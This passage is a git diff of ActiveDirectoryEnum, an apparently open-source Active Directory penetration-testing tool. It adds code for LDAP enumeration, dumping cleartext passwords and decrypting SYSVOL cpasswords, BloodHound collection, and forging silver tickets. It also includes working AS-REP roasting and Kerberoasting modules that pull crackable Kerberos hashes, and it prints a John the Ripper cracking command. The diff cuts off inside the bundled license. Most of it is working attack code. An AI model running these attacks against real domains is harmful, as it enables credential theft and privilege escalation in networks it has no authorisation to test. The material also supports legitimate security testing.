BloodHound', action='store_true') - parser.add_argument('-spn', help='Attempt to get all SPNs and perform Kerberoasting', action='store_true') - parser.add_argument('-sysvol', help='Search sysvol for GPOs with cpassword and decrypt it', action='store_true') - parser.add_argument('--all', help='Run all checks', action='store_true') - parser.add_argument('--no-creds', help='Start without credentials', action='store_true') - parser.add_argument('--dry-run', help='Don\'t execute a test but run as if. 
Used for testing params etc.', action='store_true') - parser.add_argument('--exploit', type=str, help='Show path to PoC exploit code') - - if len(args) == 1: - parser.print_help(sys.stderr) - sys.exit(0) - - args = parser.parse_args() - - if args.exploit: - from .exploits.exploits import Exploits - exp = Exploits() - queryResult = exp.query_exploits(args.exploit) - - if queryResult: - print('Exploit for: ' + colored(args.exploit.lower(), 'green') + f' can be found at: {queryResult}') - sys.exit(0) - else: - print(f'{args.exploit.lower()} not in imbedded exploits') - sys.exit(0) - - if not args.dc: - print("--dc argument is required") - sys.exit(0) - - # If theres more than 4 sub'ed (test.test.domain.local) - tough luck sunny boy - domainRE = re.compile(r'^((?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z]+)$') - userRE = re.compile(r'^([a-zA-Z0-9-\.]+@(?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z0-9-]+)$') - - domainMatch = domainRE.findall(args.dc) - - if not domainMatch: - print('[ ' + colored('ERROR', 'red') +' ] Domain flag has to be in the form "domain.local"') - sys.exit(1) - - if args.all: - args.smb = True - args.kerberos_preauth = True - args.bloodhound = True - args.spn = True - if args.no_creds: - args.user = False - else: - userMatch = userRE.findall(args.user) - if not userMatch: - print('[ ' + colored('ERROR', 'red') +' ] User flag has to be in the form "user@domain.local"') - sys.exit(1) - - - # Boolean flow control flags - file_to_write = args.out_file if args.out_file else f'{args.dc}' - - enumAD = EnumAD(args.dc, args.secure, file_to_write, args.smb, args.bloodhound, args.kerberos_preauth, args.spn, args.sysvol, args.dry_run, args.user) - - # Just print a blank line for output sake - print('') diff --git a/ade/__main__.py b/ade/__main__.py index 42cee26..fc60bea 100644 --- a/ade/__main__.py +++ b/ade/__main__.py @@ -1,5 +1,5 @@ #!/usr/bin/env python -import ade +from ade import ade import sys ade.main(sys.argv) \ No 
newline at end of file diff --git a/ade/ade.py b/ade/ade.py new file mode 100644 index 0000000..90cf41a --- /dev/null +++ b/ade/ade.py @@ -0,0 +1,540 @@ +#!/usr/bin/env python3 +from ldap3 import Server, Connection, ALL, ALL_ATTRIBUTES, LEVEL, SUBTREE, ALL_OPERATIONAL_ATTRIBUTES +from ldap3.core.exceptions import LDAPBindError, LDAPSocketOpenError, LDAPSocketSendError +from ldap3.core.exceptions import LDAPKeyError +from impacket.smbconnection import SessionError +from impacket.nmb import NetBIOSTimeout, NetBIOSError +from getpass import getpass +from termcolor import colored +from impacket import smbconnection +from impacket.dcerpc.v5 import srvs, epm +import contextlib, argparse, sys, socket, json, re, os, base64 +from dns.resolver import NXDOMAIN +import textwrap + +# Thanks SecureAuthCorp for GetNPUsers.py +# For Kerberos preauthentication +from impacket.krb5 import constants +from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, KRB_ERROR, AS_REP, seq_set, seq_set_iter +from impacket.krb5.kerberosv5 import sendReceive, KerberosError +from impacket.krb5.types import KerberosTime, Principal +from pyasn1.codec.der import decoder, encoder +from pyasn1.type.univ import noValue +from binascii import hexlify +import datetime, random +from .modEnumerator.modEnumerator import ModEnumerator +from .connectors.connectors import Connectors +from .utils.utils import Utils + +# Thanks SecureAuthCorp for GetUserSPNs.py +# For SPN enum +from impacket.krb5.ccache import CCache +from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS +from impacket.ntlm import compute_lmhash, compute_nthash +from impacket.krb5.asn1 import TGS_REP + +from bloodhound import BloodHound, resolve_collection_methods +from bloodhound.ad.domain import AD +from bloodhound.ad.authentication import ADAuthentication + + +class EnumAD(): + + def __init__(self, domainController, ldaps, output, enumsmb, bhout, kpre, spnEnum, searchSysvol, dryrun, exploits, silvertgt, domuser=None): + 
self.server = domainController + self.domuser = domuser + self.ldaps = ldaps + self.output = output if output is not None else domainController + self.bhout = bhout + self.kpre = kpre + self.spnEnum = spnEnum + self.enumsmb = enumsmb + self.searchSysvol = searchSysvol + self.silvertgt = silvertgt + + self.ou_structure = domainController.split('.') + self.dc_string='' + for element in self.ou_structure: + self.dc_string += 'dc={},'.format(element) + + # LDAP properties + # At the moment we just want everything + self.ldapProps = ["*"] + + # Initialize modules + self.connectors = Connectors() + self.enumerator = ModEnumerator() + self.utils = Utils() + + # Setting lists containing elements we want from the domain controller + self.computers = [] + self.people = [] + self.groups = [] + self.spn = [] + self.acl = [] + self.gpo = [] + self.domains = [] + self.ous = [] + self.deletedUsers = [] + self.passwd = False + self.passwords = {} + # Holds the values of servers that has been fingerprinted to a particular service + self.namedServers = {} + + # TODO: Figure a good way to go through the code dryrun + if dryrun: + print(self.server, self.domuser, self.ldaps, self.output, self.bhout, self.kpre, self.spnEnum, self.enumsmb, self.searchSysvol, self.ou_structure, self.dc_string) + return + + if domuser is not False: + self.runWithCreds() + else: + self.runWithoutCreds() + + self.enumNULLSessions() + self.enumDeleted() + self.enumerate_names() + self.checkForPW() + self.checkOS() + self.write_file() + if exploits: + self.testExploits() + + # Unbind the connection to release the handle + self.conn.unbind() + + + def runWithCreds(self): + self.CREDS = True + if not self.passwd: + self.passwd = str(getpass()) + self.bind() + self.search() + + if self.searchSysvol: + self.checkSYSVOL() + + if self.bhout: + self.outputToBloodhoundJson() + + if self.kpre: + self.enumKerbPre() + + if self.spnEnum: + self.enumSPNUsers() + + if self.enumsmb: + # Setting variables for further testing 
and analysis + self.smbShareCandidates = [] + self.sortComputers() + self.enumSMB() + + # Lets clear variable now + self.passwd = None + + return + + + def runWithoutCreds(self): + self.CREDS = False + print('[ ' + colored('INFO', 'green') + ' ] Attempting to get objects without credentials') + self.passwd = '' + self.domuser = '' + print('') + + self.bind() + self.search() + + self.enumForCreds(self.people) + + return + + + @contextlib.contextmanager + def suppressOutput(self): + with open(os.devnull, 'w') as devnull: + with contextlib.redirect_stderr(devnull) as err, contextlib.redirect_stdout(devnull) as out: + yield (err, out) + + + def enumDeleted(self): + if len(self.deletedUsers) > 0: + print('[ ' + colored('INFO', 'green') +' ] Searching for juicy info in deleted users') + self.enumForCreds(self.deletedUsers) + + + def enumNULLSessions(self): + self.enumerator.enumNULLSessions(self.server, self.connectors) + + + def testExploits(self): + from .exploits import exploits + print('[ ' + colored('INFO', 'green') +' ] Attempting to run imbedded exploits...') + exp = exploits.Exploits() + exp.run(self.server, self.computers[0]["name"]) + + if len(exp.vulnerable) > 0: + cves = "" + for exploit in exp.vulnerable: + cves += f"{exploit}, " + print('[ ' + colored('WARN', 'yellow') + f' ] DC may be vulnerable to: [ ' + colored(cves[:-2], 'green') + ' ]') + else: + print('[ ' + colored('OK', 'green') + ' ] DC not vulnerable to included exploits') + + + def bind(self): + try: + if self.ldaps: + self.conn = self.connectors.ldap_connector(self.server, True, self.domuser, self.passwd) + print('\033[1A\r[ ' + colored('OK', 'green') +' ] Bound to LDAPS server: {0}'.format(self.server)) + else: + self.conn = self.connectors.ldap_connector(self.server, False, self.domuser, self.passwd) + print('\033[1A\r[ ' + colored('OK', 'green') +' ] Bound to LDAP server: {0}'.format(self.server)) + except (LDAPBindError, LDAPSocketOpenError): + if self.ldaps: + print('\033[1A\r[ ' + 
colored('ERROR', 'red') +' ] Failed to bind to LDAPS server: {0}'.format(self.server)) + else: + print('\033[1A\r[ ' + colored('ERROR', 'red') +' ] Failed to bind to LDAP server: {0}'.format(self.server)) + sys.exit(1) + + + def search(self): + # Get computer objects + self.conn.search(self.dc_string[:-1], '(&(sAMAccountType=805306369)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))', attributes=self.ldapProps, search_scope=SUBTREE) + for entry in self.conn.entries: + self.computers.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all Computer objects') + + # Get person objects + self.conn.search(self.dc_string[:-1], '(objectCategory=person)', attributes=self.ldapProps, search_scope=SUBTREE) + for entry in self.conn.entries: + self.people.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all Person objects') + + # Get group objects + self.conn.search(self.dc_string[:-1], '(|(samaccounttype=268435456)(samaccounttype=268435457)(samaccounttype=536870912)(samaccounttype=536870913)(primarygroupid=*))', attributes=self.ldapProps, search_scope=SUBTREE) + for entry in self.conn.entries: + self.groups.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all Group objects') + + # Get SPN objects + self.conn.search(self.dc_string[:-1], '(&(samaccounttype=805306368)(serviceprincipalname=*))', attributes=self.ldapProps, search_scope=SUBTREE) + for entry in self.conn.entries: + self.spn.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all SPN objects') + + # Get ACL objects + self.conn.search(self.dc_string[:-1], '(|(samAccountType=805306368)(samAccountType=805306369)(samAccountType=268435456)(samAccountType=268435457)(samAccountType=536870912)(samAccountType=536870913)(objectClass=domain)(&(objectcategory=groupPolicyContainer)(flags=*))(objectcategory=organizationalUnit))', attributes=self.ldapProps, search_scope=SUBTREE) + for entry in self.conn.entries: + self.acl.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all ACL 
objects') + + # Get GPO objects + self.conn.search(self.dc_string[:-1], '(|(&(&(objectcategory=groupPolicyContainer)(flags=*))(name=*)(gpcfilesyspath=*))(objectcategory=organizationalUnit)(objectClass=domain))', attributes=self.ldapProps, search_scope=SUBTREE) + for entry in self.conn.entries: + self.gpo.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all GPO objects') + + # Get Domain + self.conn.search(self.dc_string[:-1], '(objectclass=domain)', attributes=self.ldapProps, search_scope=SUBTREE) + for entry in self.conn.entries: + self.domains.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all Domains') + + # Get OUs + self.conn.search(self.dc_string[:-1], '(objectclass=organizationalUnit)', attributes=self.ldapProps, search_scope=SUBTREE) + for entry in self.conn.entries: + self.ous.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all OUs') + + # Get deleted users + self.conn.search(self.dc_string[:-1], '(objectclass=user)', attributes=self.ldapProps, search_scope=SUBTREE, controls=[('1.2.840.113556.1.4.417', True, None)]) + for entry in self.conn.entries: + self.deletedUsers.append(entry) + print('[ ' + colored('OK', 'green') +' ] Got all deleted users') + + + def enumerate_names(self): + self.namedServers = self.enumerator.enumerate_server_names(self.computers) + # TODO + + + ''' + Since it sometimes is real that the property 'userPassword:' is set + we test for it and dump the passwords + ''' + def checkForPW(self): + passwords = self.enumerator.enumerate_for_cleartext_passwords(self.people, self.server) + self.passwords = { **passwords, **self.passwords } + + if len(self.passwords.keys()) > 0: + with open(f'{self.output}-clearpw', 'w') as f: + json.dump(self.passwords, f, sort_keys=False) + + if len(self.passwords.keys()) == 1: + print('[ ' + colored('WARN', 'yellow') +' ] Found {0} clear text password'.format(len(self.passwords.keys()))) + elif len(self.passwords.keys()) == 0: + print('[ ' + colored('OK', 'green') +' ] 
Found {0} clear text password'.format(len(self.passwords.keys()))) + else: + print('[ ' + colored('OK', 'green') +' ] Found {0} clear text passwords'.format(len(self.passwords.keys()))) + + + ''' + While it is not unusual to find EOL servers hidden or forgotten these + often makes easier targets for lateral movemen, and because of that + we'll dump the lowest registered OS and the respective hosts for easier + enumeration afterwards + ''' + def checkOS(self): + os_json = self.enumerator.enumerate_os_version(self.computers) + + for key, value in os_json.items(): + if len(value) == 0: + continue + with open(f'{self.output}-oldest-OS', 'w') as f: + for item in value: + f.write('{0}: {1}\n'.format(key, item)) + break + + print('[ ' + colored('OK', 'green') + f' ] Wrote hosts with oldest OS to {self.output}-oldest-OS') + + + def checkSYSVOL(self): + cpasswords = self.enumerator.enumSYSVOL(self.server, self.connectors, self.domuser, self.passwd) + + if len(cpasswords.keys()) > 0: + with open('{0}-cpasswords.json'.format(self.server), 'w') as f: + json.dump(cpasswords, f) + + if len(cpasswords.keys()) == 1: + print('\033[1A\r[ ' + colored('OK', 'green') +' ] Found {0} cpassword in a GPO on SYSVOL share'.format(len(cpasswords.keys()))) + else: + print('\033[1A\r[ ' + colored('OK', 'green') +' ] Found {0} cpasswords in GPOs on SYSVOL share'.format(len(cpasswords.keys()))) + + + def outputToBloodhoundJson(self): + print('[ ' + colored('OK', 'green') +' ] Generating BloodHound output - this may take time...') + try: + with self.suppressOutput(): + opts = argparse.Namespace(dns_tcp=False, global_catalog=self.server) + auth = ADAuthentication(username=self.domuser, password=self.passwd, domain=self.server) + try: + ad = AD(auth=auth, domain=self.server, nameserver=None, dns_tcp=False) + ad.dns_resolve(kerberos=False, domain=self.server, options=opts) + except (NXDOMAIN) as e: + # So we didnt succeed with DNS lookup. 
Most likely an internal, so lets try to point to the DC + print('[ ' + colored('WARN', 'yellow') +' ] DNS lookup of Domain Controller failed - attempting to set the DC as Nameserver') + try: + ns = socket.gethostbyname(self.server) + opts = argparse.Namespace(dns_tcp=False, global_catalog=self.server, nameserver=ns) + ad = AD(auth=auth, domain=self.server, nameserver=ns, dns_tcp=False) + ad.dns_resolve(kerberos=False, domain=self.server, options=opts) + except (NXDOMAIN) as e: + # I'm all out of luck + print('[ ' + colored('ERROR', 'red') +' ] DNS lookup of Domain Controller failed with DC as nameserver') + exit(1) + with self.suppressOutput(): + bloodhound = BloodHound(ad) + bloodhound.connect() + collection = resolve_collection_methods('Session,Trusts,ACL,DCOM,RDP,PSRemote') + bloodhound.run(collect=collection, num_workers=40, disable_pooling=False) + print('[ ' + colored('OK', 'green') +' ] BloodHound output generated') + except Exception as e: + print('[ ' + colored('ERROR', 'red') + f' ] Generating BloodHound output failed: {e}') + + + def sortComputers(self): + for computer in self.computers: + try: + if computer['dNSHostName'] not in self.smbShareCandidates: + self.smbShareCandidates.append(computer['dNSHostName']) + except LDAPKeyError: + # No dnsname registered + continue + if len(self.smbShareCandidates) == 1: + print('[ ' + colored('OK', 'green') +' ] Found {0} dnsname'.format(len(self.smbShareCandidates))) + else: + print('[ ' + colored('OK', 'green') +' ] Found {0} dnsnames'.format(len(self.smbShareCandidates))) + + + def enumSMB(self): + smbBrowseable = self.enumerator.enumSMB(self.connectors, self.smbShareCandidates, self.server, self.domuser, self.passwd) + + availDirs = [] + for key, value in smbBrowseable.items(): + for _, v in value.items(): + if v: + availDirs.append(key) + + if len(self.smbShareCandidates) == 1: + print('[ ' + colored('OK', 'green') + ' ] Searched {0} share and {1} share with {2} subdirectories/files is browseable by 
{3}'.format(len(self.smbShareCandidates), len(smbBrowseable.keys()), len(availDirs), self.domuser)) + else: + print('[ ' + colored('OK', 'green') + ' ] Searched {0} shares and {1} shares with {2} subdirectories/file are browseable by {3}'.format(len(self.smbShareCandidates), len(smbBrowseable.keys()), len(availDirs), self.domuser)) + if len(smbBrowseable.keys()) > 0: + self.utils.WriteFiles(self.output, smbBrowseable, 'open-smb.json') + + + def write_file(self): + files_to_write = { + "users": self.people, + "computers": self.computers, + "groups": self.groups, + "spn": self.spn, + "acl": self.acl, + "gpo": self.gpo, + "domains": self.domains, + "ous": self.ous, + "deletedUsers": self.deletedUsers + } + for name, collection in files_to_write.items(): + self.utils.WriteFiles(self.output, collection,name) + + + def enumKerbPre(self): + hashes = self.enumerator.enumASREPRoast(self.conn, self.server, self.dc_string[:-1]) + + if len(hashes) > 0: + self.utils.WriteFiles(self.output, hashes, 'ASREPHashes') + print('[ ' + colored('OK', 'yellow') +' ] Wrote all hashes to {0}-jtr-hashes'.format(self.server)) + else: + print('[ ' + colored('OK', 'green') +' ] Got 0 hashes') + + + def enumSPNUsers(self): + user_tickets = self.enumerator.enumKerberoast(self.spn, self.domuser, self.passwd) + + if len(user_tickets.keys()) > 0: + if self.silvertgt: + for _, value in user_tickets: + self.silverTicket(value.split('$')[-2]) + self.utils.WriteFiles(self.output, user_tickets, 'spn-tickets') + + if len(user_tickets.keys()) == 1: + print('[ ' + colored('OK', 'yellow') +' ] Got and wrote {0} ticket for Kerberoasting. Run: john --format=krb5tgs --wordlist= {1}-spn-tickets'.format(len(user_tickets.keys()), self.server)) + else: + print('[ ' + colored('OK', 'yellow') +' ] Got and wrote {0} tickets for Kerberoasting. 
Run: john --format=krb5tgs --wordlist= {1}-spn-tickets'.format(len(user_tickets.keys()), self.server)) + else: + print('[ ' + colored('OK', 'green') +' ] Got {0} tickets for Kerberoasting'.format(len(user_tickets.keys()))) + + + def goldenTicket(self): + from .attacks.ticketer import ticketer + # TODO + + + def silverTicket(self, nthash): + from .attacks.ticketer import ticketer + opts = argparse.Namespace(debug=False, aesKey=None, nthash=nthash, keytab=None, request=False, hashes=None, spn=None, domain_sid=str(self.domains[0]["objectSid"]), user_id=500, groups="513, 512, 520, 518, 519", duration=3650, extra_sid=None, dc_ip=socket.gethostbyname(self.server)) + tickets = ticketer.TICKETER('ade', '', self.domuser.split('@')[1], opts) + result = tickets.run() + if result: + print('[ ' + colored('WARN', 'yellow') + ' ] Created Silver Ticket for user "ade" and wrote to ade.ccache') + + + def enumForCreds(self, ldapdump): + advance, self.passwords = self.enumerator.enumForCreds(self.CREDS, self.passwords, ldapdump, self.connectors, self.server) + + if advance: + self.domuser = str(list(self.passwords.keys())[0]) + self.passwd = str(self.passwords[self.domuser]) + self.runWithCreds() + return + + +def main(args): + parser = argparse.ArgumentParser(prog='ade', formatter_class=argparse.RawDescriptionHelpFormatter, description=textwrap.dedent(''' + ___ __ _ ____ _ __ ______ + / | _____/ /_(_) _____ / __ \(_)_______ _____/ /_____ _______ __/ ____/___ __ ______ ___ + / /| |/ ___/ __/ / | / / _ \/ / / / / ___/ _ \/ ___/ __/ __ \/ ___/ / / / __/ / __ \/ / / / __ `__ \\ + / ___ / /__/ /_/ /| |/ / __/ /_/ / / / / __/ /__/ /_/ /_/ / / / /_/ / /___/ / / / /_/ / / / / / / + /_/ |_\___/\__/_/ |___/\___/_____/_/_/ \___/\___/\__/\____/_/ \__, /_____/_/ /_/\__,_/_/ /_/ /_/ + /____/ + + /*----------------------------------------------------------------------------------------------------------*/ + + ''')) + parser.add_argument('--dc', type=str, help='Hostname of the Domain Controller') + 
parser.add_argument('-o', '--out-file', type=str, help='Name prefix of output files (default: the name of the dc)') + parser.add_argument('-u', '--user', type=str, help='Username of the domain user to query with. The username has to be domain name as `user@domain.org`') + parser.add_argument('-s', '--secure', help='Try to estalish connection through LDAPS', action='store_true') + parser.add_argument('-smb', '--smb', help='Force enumeration of SMB shares on all computer objects fetched', action='store_true') + parser.add_argument('-kp', '--kerberos_preauth', help='Attempt to gather users that does not require Kerberos preauthentication', action='store_true') + parser.add_argument('-bh', '--bloodhound', help='Output data in the format expected by BloodHound', action='store_true') + parser.add_argument('-spn', help='Attempt to get all SPNs and perform Kerberoasting', action='store_true') + parser.add_argument('-sysvol', help='Search sysvol for GPOs with cpassword and decrypt it', action='store_true') + parser.add_argument('--all', help='Run all checks', action='store_true') + parser.add_argument('--no-creds', help='Start without credentials', action='store_true') + parser.add_argument('--dry-run', help='Don\'t execute a test but run as if. Used for testing params etc.', action='store_true') + parser.add_argument('--silvertgt', help='Attempts to get a Silver Ticket. 
Requires -spn', action='store_true') + parser.add_argument('--exploits', help='Run imbedded exploits', action='store_true') + parser.add_argument('--exploit', type=str, help='Show path to PoC exploit code') + parser.add_argument('--version', help='Print currently installed version', action='store_true') + + if len(args) == 1: + parser.print_help(sys.stderr) + sys.exit(0) + + args = parser.parse_args() + + if args.exploit: + from .exploits.exploits import Exploits + exp = Exploits() + queryResult = exp.query_exploits(args.exploit) + + if queryResult: + print('Exploit for: ' + colored(args.exploit.lower(), 'green') + f' can be found at: {queryResult}') + sys.exit(0) + else: + print(f'{args.exploit.lower()} not in imbedded exploits') + sys.exit(0) + + if args.version: + import pkg_resources + version = pkg_resources.require("ActiveDirectoryEnum")[0].version + print(f'ActiveDirectoryEnum (ade) version: {version}') + sys.exit(0) + + if not args.dc: + print("--dc argument is required") + sys.exit(0) + + if args.silvertgt and not args.spn: + print('--silvertgt requires -spn to run') + sys.exit(0) + + # If theres more than 4 sub'ed (test.test.domain.local) - tough luck sunny boy + domainRE = re.compile(r'^((?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z]+)$') + userRE = re.compile(r'^([a-zA-Z0-9-\.]+@(?:[a-zA-Z0-9-.]+)?(?:[a-zA-Z0-9-.]+)?[a-zA-Z0-9-]+\.[a-zA-Z0-9-]+)$') + + domainMatch = domainRE.findall(args.dc) + + if not domainMatch: + print('[ ' + colored('ERROR', 'red') +' ] Domain flag has to be in the form "domain.local"') + sys.exit(1) + + if args.all: + args.smb = True + args.kerberos_preauth = True + args.bloodhound = True + args.spn = True + args.exploits = True + args.sysvol = True + args.silvertgt = True + if args.no_creds: + args.user = False + else: + userMatch = userRE.findall(args.user) + if not userMatch: + print('[ ' + colored('ERROR', 'red') +' ] User flag has to be in the form "user@domain.local"') + sys.exit(1) + + + # Boolean flow 
control flags + file_to_write = None + if args.out_file: + file_to_write = args.out_file + + EnumAD(args.dc, args.secure, file_to_write, args.smb, args.bloodhound, args.kerberos_preauth, args.spn, args.sysvol, args.dry_run, args.exploits, args.silvertgt, args.user) + + # Just print a blank line for output sake + print('') diff --git a/external/bloodhound/enumeration/__init__.py b/ade/attacks/asreproast/__init__.py old mode 100755 new mode 100644 similarity index 100% rename from external/bloodhound/enumeration/__init__.py rename to ade/attacks/asreproast/__init__.py diff --git a/ade/attacks/asreproast/asreproast.py b/ade/attacks/asreproast/asreproast.py new file mode 100644 index 0000000..36c4834 --- /dev/null +++ b/ade/attacks/asreproast/asreproast.py @@ -0,0 +1,76 @@ +from impacket.krb5 import constants +from impacket.krb5.asn1 import AS_REQ, KERB_PA_PAC_REQUEST, AS_REP, seq_set, seq_set_iter +from impacket.krb5.kerberosv5 import sendReceive, KerberosError +from impacket.krb5.types import KerberosTime, Principal +from pyasn1.codec.der import decoder, encoder +from pyasn1.type.univ import noValue +from binascii import hexlify +import datetime, random + + +class AsRepRoast(): + + + def __init__(self): + pass + + + def RepRoast(self, server: str, usr: list): + + hashes = [] + # Build request for Tickets + clientName = Principal(usr, type=constants.PrincipalNameType.NT_PRINCIPAL.value) + asReq = AS_REQ() + domain = str(server).upper() + serverName = Principal('krbtgt/{0}'.format(domain), type=constants.PrincipalNameType.NT_PRINCIPAL.value) + pacReq = KERB_PA_PAC_REQUEST() + pacReq['include-pac'] = True + encodedPacReq = encoder.encode(pacReq) + asReq['pvno'] = 5 + asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value) + asReq['padata'] = noValue + asReq['padata'][0] = noValue + asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value) + asReq['padata'][0]['padata-value'] = encodedPacReq + + requestBody = 
seq_set(asReq, 'req-body') + + options = list() + options.append(constants.KDCOptions.forwardable.value) + options.append(constants.KDCOptions.renewable.value) + options.append(constants.KDCOptions.proxiable.value) + requestBody['kdc-options'] = constants.encodeFlags(options) + + seq_set(requestBody, 'sname', serverName.components_to_asn1) + seq_set(requestBody, 'cname', clientName.components_to_asn1) + + requestBody['realm'] = domain + + now = datetime.datetime.utcnow() + datetime.timedelta(days=1) + requestBody['till'] = KerberosTime.to_asn1(now) + requestBody['rtime'] = KerberosTime.to_asn1(now) + requestBody['nonce'] = random.getrandbits(31) + + supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),) + + seq_set_iter(requestBody, 'etype', supportedCiphers) + + msg = encoder.encode(asReq) + + try: + response = sendReceive(msg, domain, server) + except KerberosError as e: + if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value: + supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value), int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),) + seq_set_iter(requestBody, 'etype', supportedCiphers) + msg = encoder.encode(asReq) + response = sendReceive(msg, domain, self.server) + else: + print(e) + return None + + asRep = decoder.decode(response, asn1Spec=AS_REP())[0] + + hashes.append('$krb5asrep${0}@{1}:{2}${3}'.format(usr, domain, hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(), hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())) + + return hashes \ No newline at end of file diff --git a/ade/attacks/kerberoast/__init__.py b/ade/attacks/kerberoast/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/ade/attacks/kerberoast/kerberoast.py b/ade/attacks/kerberoast/kerberoast.py new file mode 100644 index 0000000..dc65bae --- /dev/null +++ b/ade/attacks/kerberoast/kerberoast.py @@ -0,0 +1,59 @@ +from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS, 
KerberosError +from impacket.ntlm import compute_lmhash, compute_nthash +from impacket.krb5.types import Principal +from impacket.krb5.asn1 import TGS_REP +from impacket.krb5 import constants +from pyasn1.codec.der import decoder +from binascii import hexlify +from termcolor import colored + + +class Kerberoast(): + + + def __init__(self): + pass + + + def roast(self, domuser: str, passwd: str, userDomain: str, user: str, spn: str) -> dict: + + user_tickets = {} + # Get TGT for the supplied user + client = Principal(domuser, type=constants.PrincipalNameType.NT_PRINCIPAL.value) + try: + # We need to take the domain from the user@domain since it *could* be a cross-domain user + tgt, cipher, _, newSession = getKerberosTGT(client, '', userDomain, compute_lmhash(passwd), compute_nthash(passwd), None, kdcHost=None) + + TGT = {} + TGT['KDC_REP'] = tgt + TGT['cipher'] = cipher + TGT['sessionKey'] = newSession + + try: + # Get the TGS + serverName = Principal(spn, type=constants.PrincipalNameType.NT_SRV_INST.value) + tgs, cipher, _, newSession = getKerberosTGS(serverName, userDomain, None, TGT['KDC_REP'], TGT['cipher'], TGT['sessionKey']) + # Decode the TGS + decoded = decoder.decode(tgs, asn1Spec=TGS_REP())[0] + # Get different encryption types + if decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value: + entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.rc4_hmac.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode()) + user_tickets[spn] = entry + elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value: + entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), 
hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode()) + user_tickets[spn] = entry + elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value: + entry = '$krb5tgs${0}${1}${2}$*{3}*${4}${5}'.format(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][:-12].asOctets()).decode()) + user_tickets[spn] = entry + elif decoded['ticket']['enc-part']['etype'] == constants.EncryptionTypes.des_cbc_md5.value: + entry = '$krb5tgs${0}$*{1}${2}${3}*${4}${5}'.format(constants.EncryptionTypes.des_cbc_md5.value, user, decoded['ticket']['realm'], spn.replace(':', '~'), hexlify(decoded['ticket']['enc-part']['cipher'][:16].asOctets()).decode(), hexlify(decoded['ticket']['enc-part']['cipher'][16:].asOctets()).decode()) + user_tickets[spn] = entry + + except KerberosError as err: + print('[ ' + colored('ERROR', 'red') +' ] Kerberoasting failed with error: {0}'.format(err.getErrorString()[1])) + return None + except KerberosError as err: + print('[ ' + colored('ERROR', 'red') +' ] Kerberoasting failed with error: {0}'.format(err.getErrorString()[1])) + return None + + return user_tickets \ No newline at end of file diff --git a/ade/attacks/ticketer/LICENSE b/ade/attacks/ticketer/LICENSE new file mode 100644 index 0000000..159cdd1 --- /dev/null +++ b/ade/attacks/ticketer/LICENSE @@ -0,0 +1,84 @@ +Licencing +--------- + +We provide this software under a slightly modified version of the +Apache Software License. The only changes to the document were the +replacement of "Apache" with "Impacket" and "Apache Software Foundation" +with "SecureAuth Corporation". Feel free to compare the resulting +document to the official Apache license. 
+ +The `Apache Software License' is an Open Source Initiative Approved +License. + + +The Apache Software License, Version 1.1 +Modifications by SecureAuth Corporation (see above) + +Copyright (c) 2000 The Apache Software Foundation. All rights +reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions +are met: + +1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in + the documentation and/or other materials provided with the + distribution. + +3. The end-user documentation included with the redistribution, + if any, must include the following acknowledgment: + "This product includes software developed by + SecureAuth Corporation (https://www.secureauth.com/)." + Alternately, this acknowledgment may appear in the software itself, + if and wherever such third-party acknowledgments normally appear. + +4. The names "Impacket", "SecureAuth Corporation" must + not be used to endorse or promote products derived from this + software without prior written permission. For written + permission, please contact oss@secureauth.com. + +5. Products derived from this software may not be called "Impacket", + nor may "Impacket" appear in their name, without prior written + permission of SecureAuth Corporation. + +THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED +WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES +OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 